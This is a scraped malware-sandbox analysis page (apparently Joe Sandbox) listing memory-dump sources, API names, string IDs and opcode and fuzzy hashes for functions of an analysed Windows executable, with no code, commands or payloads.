                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 20e85ab1b5ab952efb93b0779526bdff8a868b32406485d95a7bf1fd94b1e93c
                                                                                                      • Instruction ID: 54494f911bbc7deb403ea5aa9d04ae948f32f974a9a0791151332633c434acd5
                                                                                                      • Opcode Fuzzy Hash: 20e85ab1b5ab952efb93b0779526bdff8a868b32406485d95a7bf1fd94b1e93c
                                                                                                      • Instruction Fuzzy Hash: D661D422F0E78246F7649F2888447796E91BF40762F19423BE7EDC67C5EE6DE8418702
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ba638456fca968f664461109a58dbe09f34695100afe40ee1b5b01cd6d3d3dae
                                                                                                      • Instruction ID: c0cc3c36b436e862749b672a93c7d68f6e888b073f4a9f622aab4a5ae5a3b501
                                                                                                      • Opcode Fuzzy Hash: ba638456fca968f664461109a58dbe09f34695100afe40ee1b5b01cd6d3d3dae
                                                                                                      • Instruction Fuzzy Hash: 19315F37206AA2C7D746EF34C065AEE77B0FB58F14722844AC72243651F774925DC74A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9f9d1623631322c0f436638ea519f1399f6939127f5aa1a546842922f7336e0d
                                                                                                      • Instruction ID: e02f2dcd624577c5d85e4a1f1dc871e0b16862a80dc6ee5798f6ed3dd1dc8489
                                                                                                      • Opcode Fuzzy Hash: 9f9d1623631322c0f436638ea519f1399f6939127f5aa1a546842922f7336e0d
                                                                                                      • Instruction Fuzzy Hash: DA21804794F6C74AE3A24F640DA71982FE5AB77615B4E50BAC7C4D72C3DD0F28099312
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6d51e850fe667c707d3badd8f9ba365bbb31719ed8d80b2d7b32bfcf5c63edb4
                                                                                                      • Instruction ID: f22f88d6cda6a452f9e263223f856862033a7adbb0b2041657fc9207242bc6b4
                                                                                                      • Opcode Fuzzy Hash: 6d51e850fe667c707d3badd8f9ba365bbb31719ed8d80b2d7b32bfcf5c63edb4
                                                                                                      • Instruction Fuzzy Hash: 3D217F37206AA2C7D786EF34C06AAEE73B0FB58F14712844AC72643641F778925CC74A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6fafd1ae8305a66fa78aa1aff9ed54bcdddf7d7407dd5e02ef2bdfdcf7ca46b3
                                                                                                      • Instruction ID: 17d362827fbd44919fdf3c358e56f19a7cc0357e146ce98ad1ee00318b05067f
                                                                                                      • Opcode Fuzzy Hash: 6fafd1ae8305a66fa78aa1aff9ed54bcdddf7d7407dd5e02ef2bdfdcf7ca46b3
                                                                                                      • Instruction Fuzzy Hash: 1311F2770052C6D6C746CFB5C0819DAF3B5FB18F0476AC62B820487110FB39D2AACB89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 03a8157cee50fd3f03e0551a7c89415d97fe978660816f2e4eb80491d6b52f69
                                                                                                      • Instruction ID: 0a4ec16c06a9a7897fab86c67a0468d2461f9648072b9db243c407ea30460c79
                                                                                                      • Opcode Fuzzy Hash: 03a8157cee50fd3f03e0551a7c89415d97fe978660816f2e4eb80491d6b52f69
                                                                                                      • Instruction Fuzzy Hash: EAF06271B1A6958ADBE4CF28E8466297FE0E7483D5F908039D6DDC7F94DA3C90A18F04
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a2dd7a115447fe4d835552ee6c2ffec107b23a75132875a260b46f0f23fdc50f
                                                                                                      • Instruction ID: 22f19d0304595e824c2581d9b9935a4c167e222997acc99a748f38f79def1c73
                                                                                                      • Opcode Fuzzy Hash: a2dd7a115447fe4d835552ee6c2ffec107b23a75132875a260b46f0f23fdc50f
                                                                                                      • Instruction Fuzzy Hash: FCF000770052C696C746CBB5C08189AF3B5FB19F0576AC62B820087110FA69E2AAC789
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ea4d63f2e6c65e337cc8d1ee1b814bbe38b6355ed5e2c3e407f4dfb9366f681a
                                                                                                      • Instruction ID: f1d5e76421cb110912c04eddf473b1736db0f70d93b85c8d0a9c62a99081382c
                                                                                                      • Opcode Fuzzy Hash: ea4d63f2e6c65e337cc8d1ee1b814bbe38b6355ed5e2c3e407f4dfb9366f681a
                                                                                                      • Instruction Fuzzy Hash: F4F0916310625292CB58CF39C14105BA772FF64F0937AC5388A188A124E3BEC65BD79C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 78e895a8854d57fab48baa2fcb91a05f682f1ba31858384382d4fba5be47ac01
                                                                                                      • Instruction ID: 341e868af591827babe58d6f45bc481a699d8e8dac2fc14a39424cc952d5f510
                                                                                                      • Opcode Fuzzy Hash: 78e895a8854d57fab48baa2fcb91a05f682f1ba31858384382d4fba5be47ac01
                                                                                                      • Instruction Fuzzy Hash: 37F0AA2310629292CB48CF39C04005BA372FF64F0937AC5388A188A124E3BEC68BD798
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 35763b16fc0ea44f54ad57ee831f0ab1efb1a630dc7c22efc4e6bfc2802b83ba
                                                                                                      • Instruction ID: f336dc9e9e796dbca2417acabbfdbdc146d6fc81571ab6155e8ffc60699b122a
                                                                                                      • Opcode Fuzzy Hash: 35763b16fc0ea44f54ad57ee831f0ab1efb1a630dc7c22efc4e6bfc2802b83ba
                                                                                                      • Instruction Fuzzy Hash: 86E0D12310629292CB08CF39C04005AA372EF64F0837AC0388A088A124E3BEC64BD398
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 764c504831dcae6fed4f72b279cc35c02a426ea737900707234b1a4de097a301
                                                                                                      • Instruction ID: 8988677982b23f22eccfaab8a3e8e6c15e6c9044f283cf7483cb65e34bd15843
                                                                                                      • Opcode Fuzzy Hash: 764c504831dcae6fed4f72b279cc35c02a426ea737900707234b1a4de097a301
                                                                                                      • Instruction Fuzzy Hash: D6A0022291EC03F0E6848F01E8541302B30FB60302B840133D68DC10A4FF3DA640D744
                                                                                                      Memory Dump Source
• Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
• Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e8a7a31c33a269a59c1538be2bd036b2d1bd0459060e45bf358329a224fa751
• Instruction ID: 227d60d4e3976e3cc6d276643604bb099d91ca20d1322c60905afdab92b8c05f
• Opcode Fuzzy Hash: 5e8a7a31c33a269a59c1538be2bd036b2d1bd0459060e45bf358329a224fa751
• Instruction Fuzzy Hash:
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
• Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 459529453-1866435925
• Opcode ID: 0f7fa71a9fe66e1fc95adaf3505383be2ab9a784402976e13fa3ff9bca43f5ea
• Instruction ID: 7f1d1cc578da2c72753a30e0ff6af965e3afc371a3d9bd4b4df467a8a28ebe0c
• Opcode Fuzzy Hash: 0f7fa71a9fe66e1fc95adaf3505383be2ab9a784402976e13fa3ff9bca43f5ea
• Instruction Fuzzy Hash: 5491AC32A0AA8696EB54DF15E4853B97BA0FB84B92F544132DF8E837A4DF7CD845C300
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
• Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: ef20db07cd8982639cb62bae59e5f91ae9733d25f82086f8cb52826f578afae3
• Instruction ID: 7131050cac52195a3804cc435858655a2b5776e9d9e2a362bea6716d67400452
• Opcode Fuzzy Hash: ef20db07cd8982639cb62bae59e5f91ae9733d25f82086f8cb52826f578afae3
• Instruction Fuzzy Hash: DD12A521A2E143A6FB205F14E0487B97AA5FB40752F984131E7D9C75C4DF7CEA80CB21
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
• Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 423362bbb715d2795c057120a6b42bd2485c1799cc69fa04143f818ce7cdd50b
• Instruction ID: e8f562bb088ec53a3f36fdd455aa0af60d3a7db0084232bfacd37e316287c43b
• Opcode Fuzzy Hash: 423362bbb715d2795c057120a6b42bd2485c1799cc69fa04143f818ce7cdd50b
• Instruction Fuzzy Hash: 28D18A22A297419AEB209F65D4803AD7BA4FB45B89F100135EBCDD7B96DF3CE681C701
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
• Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID: invalid string position
• API String ID: 2081738530-1799206989
• Opcode ID: fb0e87724d7bafdbaa693a83112c149b3eaf14ca156fab27724b0630734682c2
• Instruction ID: 975f76fc7e580391abf3ab05fb83125a7c336c65300843254a45a71eac6a4566
• Opcode Fuzzy Hash: fb0e87724d7bafdbaa693a83112c149b3eaf14ca156fab27724b0630734682c2
• Instruction Fuzzy Hash: D0819322A1AA4295EE15DF19D8402B97B60FB84BE6F188131DF9DC77A5DF3DE542C300
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
• Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 720a303292af339a0c062d452de7dc2e26e36da20086ac8bab5a24fa68cd03b5
• Instruction ID: 399819887e29313256d796c49167d550b6f183e0dfef1d2b1b8373ec075c0074
• Opcode Fuzzy Hash: 720a303292af339a0c062d452de7dc2e26e36da20086ac8bab5a24fa68cd03b5
• Instruction Fuzzy Hash: 0941D321B1BA0241EA15CF16A8506762ED6BF05FA2F494235EF9FC7B94EE3CE4458300
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
• Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$p$p
• API String ID: 3215553584-1995029353
• Opcode ID: 287f793cd9e57a200f6c54826b9ebc593c668fda19194eebe723da172aebf24d
• Instruction ID: a7a35da4ec52863c84017b5839fd065d0ca17dc85abc68a6843ebf5f58d1df13
• Opcode Fuzzy Hash: 287f793cd9e57a200f6c54826b9ebc593c668fda19194eebe723da172aebf24d
• Instruction Fuzzy Hash: 66125862B0E14286FB249F29D1542BA7EA1FB80756F844435F7CBC66C4DF7CE9808B15
APIs
Memory Dump Source
• Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
• Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 543e3b3d023cc5dc721e80ffbc244158559b423821014bc6dfd7f15a78ec0d0f
• Instruction ID: bf627df96927e53d709f3627ba46cc43acd3c173b5ecb7030d5660805d8d4426
• Opcode Fuzzy Hash: 543e3b3d023cc5dc721e80ffbc244158559b423821014bc6dfd7f15a78ec0d0f
• Instruction Fuzzy Hash: 2EC1C322A0EA8B91E7609F5594402BE7F91FF91B92F554136EBCE833D2DE7CE8558300
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
• Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
Similarity
• API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 1386471777-1405518554
• Opcode ID: 2fb573258588d9a0732103de3035a81878e4e8febdd76704b08a3a214b084dd1
• Instruction ID: 1473d137b71d0e085572a67a9df962ad74ed4253a364edea5b10ac84e185fdf8
• Opcode Fuzzy Hash: 2fb573258588d9a0732103de3035a81878e4e8febdd76704b08a3a214b084dd1
• Instruction Fuzzy Hash: 60518922B0AB819AFB54DFB0E4902BD3B70AF54748F044134DF8EA7A56DF38E6568304
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
• Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: d6d876a61148c08aaa09cadfa9bfd10722785b3aceef806c8e2bf92c7e5e0abf
• Instruction ID: 7ca2af19205049faba0e6ee5ff4f3d3523210f2c9744244720a872b3872473a3
• Opcode Fuzzy Hash: d6d876a61148c08aaa09cadfa9bfd10722785b3aceef806c8e2bf92c7e5e0abf
• Instruction Fuzzy Hash: D731C725B2BB42A1EE569F56E81067A2BA4BF04BA2F590534DF9DC7790EF3CF5408340
APIs
                                                                                                      Memory Dump Source
